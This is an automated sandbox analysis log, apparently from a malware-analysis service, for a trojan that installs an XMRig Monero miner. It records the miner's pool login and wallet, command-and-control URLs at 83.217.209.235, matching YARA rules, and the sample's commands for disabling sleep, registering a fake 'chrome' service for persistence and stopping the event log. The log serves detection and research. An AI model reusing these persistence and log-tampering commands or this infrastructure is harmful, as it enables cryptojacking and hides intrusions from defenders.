Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4335mezgwwsmbw161uqp6waqyxztrvxwsbpkzpxtxxah4mtoxxbierhgbab8xhdzaemkwwvnp49wwk5ribj37ak2azkaekr","pass":"cw","agent":"xmrig/6.21.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}. |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.209.235 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzx |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c |
Source: svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpI |
Source: svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpwvr |
Source: svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpx |
Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxxhcx |
Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0 |
Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0 |
Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0 |
Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0 |
Source: svchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms |
Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25 |
Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25 |
Source: Process Memory Space: svchost.exe PID: 4040, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3140:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1344:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5428:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3808:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1852:120:WilError_03 |
Source: C:\Windows\System32\svchost.exe | Mutant created: \BaseNamedObjects\Global\wvryikmmhskmhxzl |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03 |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" |
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe" | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | |
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | |
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | |
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "chrome" | |
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto" | |
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "chrome" | |
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\ProgramData\MicrosoftEdge\Edgee.exe C:\ProgramData\MicrosoftEdge\Edgee.exe | |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | |
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe | |
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe | |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "chrome" | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto" | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "chrome" | Jump to behavior |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | Jump to behavior |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | Jump to behavior |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | Jump to behavior |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | Jump to behavior |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe | Jump to behavior |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe | Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\ProgramData\MicrosoftEdge\Edgee.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: pnrpnsp.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll | Jump to behavior |
